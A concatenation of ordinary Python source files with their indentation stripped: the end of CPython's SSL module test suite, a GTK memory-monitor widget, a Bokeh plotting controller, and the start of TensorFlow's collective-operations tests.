('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if expected is None and IS_OPENSSL_1_1:
# OpenSSL 1.1.0 raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
gui.py
|
import cairo
import gi
import threading
import time
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository.GdkPixbuf import Pixbuf, InterpType
from sand.gui_module import GUIComponent
from sand.modules.memory.sensor import MemorySensor
import os
import pkg_resources
class SandMemoryGui(GUIComponent):
def __init__(self, configuration="configuration.yaml"):
GUIComponent.__init__(self, "{}/{}".format(__package__, configuration))
self._label_memory = []
self._memory_sensor = MemorySensor()
self._memory_information = None
self.current_drawing_offset = self.configuration["start-drawing-offset"]
self._module_color = "#{}".format(self.configuration["module-color"])
self._thread_refresh = None
def create_icon(self):
label_description = Gtk.Label()
label_description.set_markup("<span foreground='{}'><i><big><b>{}</b></big></i></span>".format(self._module_color, self.configuration["description"]))
self.layout.put(label_description, self.configuration["description-position-x"], self.configuration["description-position-y"])
image = Gtk.Image()
icon_filepath = pkg_resources.resource_filename(__name__, self.configuration["icon-filename"])
pixbuf = Pixbuf.new_from_file(icon_filepath)
image.set_from_pixbuf(pixbuf.scale_simple(self.configuration["icon-dimension-x"],
self.configuration["icon-dimension-y"], InterpType.BILINEAR))
self.layout.put(image, self.configuration["icon-position-x"], self.configuration["icon-position-y"])
def build(self):
self.create_icon()
self._build_memory_labels()
self._thread_refresh = threading.Thread(target=self.refresh, args=())
self._thread_refresh.setDaemon(True)
self._thread_refresh.start()
def _build_memory_labels(self):
self._memory_information = self._memory_sensor.read()
for element in self.configuration["labels-mapping"]:
label = Gtk.Label()
description = self.configuration["labels-mapping"][element]
label.set_markup("<span foreground='{}'>{}<b>{}</b></span>".format(self._module_color, description, self._memory_information[element]))
self.layout.put(label, 0, self.current_drawing_offset)
self.current_drawing_offset += self.configuration["horizontal-spacing"]
self._label_memory.append(label)
def refresh(self):
while True:
self._memory_information = self._memory_sensor.read()
i = 0
for element in self.configuration["labels-mapping"]:
description = self.configuration["labels-mapping"][element]
self._label_memory[i].set_markup("<span foreground='{}'>{}<b>{}</b></span>".format(self._module_color, description, self._memory_information[element]))
i += 1
time.sleep(self.configuration["refresh-time"])
|
controller.py
|
"""This module handles the view and model interactions."""
import time
from bokeh.io import curdoc
from threading import Thread
import view
import model
import computation
doc = curdoc()
LOOP_TIME = 1000
class PlotContainer:
def __init__(self, figure, sources, idx=0):
self.figure = figure
self.sources = sources
self.idx = idx
table_cols = ("x", "lower CI", "upper CI", "mean")
cfg = dict()
sources = model.sources()
v_tabs = view.Plots(sources, cfg)
v_settings = view.Settings(cfg)
v_control = view.Control(cfg)
table_source = model.table_source(True)
v_table = view.Table(table_source)
v_view = view.build_view(v_control.layout,
v_settings.layout,
v_tabs.layout,
v_table.layout)
plots = [PlotContainer(figure, sources, 0)
for figure, sources in zip(v_tabs.plots, sources)]
def start_thread(target):
def wrapper():
thread = Thread(target=step_all)
thread.start()
return wrapper
def loopable():
cur_plot = plots[cfg["tab"]]
window = cfg["past_size"] + cfg["future_size"]
return cur_plot.idx < cur_plot.sources.series.shape[0] - window - 1
def main_loop():
if cfg["on_off"] == 0:
step_runs()
def step_all():
while loopable():
step_single(False)
cur_plot = plots[cfg["tab"]]
cur_plot.sources.update()
def step_runs():
sleep_time = (LOOP_TIME-200) / cfg["speed"] / 1000.0
steps = cfg["speed"]
for _ in range(steps):
step_single()
time.sleep(sleep_time)
def step_single(update=True):
cur_plot = plots[cfg["tab"]]
computation.traverse(cur_plot,
cfg["past_size"],
cfg["future_size"],
cfg["ci"],
cfg["zoom"],
update)
cur_plot.idx += 1
cur_plot.sources.update()
table_source.data = cur_plot.sources.table.data
def reset():
plot = plots[cfg["tab"]]
plot.sources.reset()
plot.idx = 0
plot.figure.x_range.start = plot.sources.series.index.min()
plot.figure.x_range.end = plot.sources.series.index.max()
# add callbacks
v_control.step_single.on_click(step_single)
v_control.step_all.on_click(step_all)
v_control.reset.on_click(reset)
doc.add_root(v_view)
doc.title = "Predictive Calls"
curdoc().add_periodic_callback(main_loop, LOOP_TIME)
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
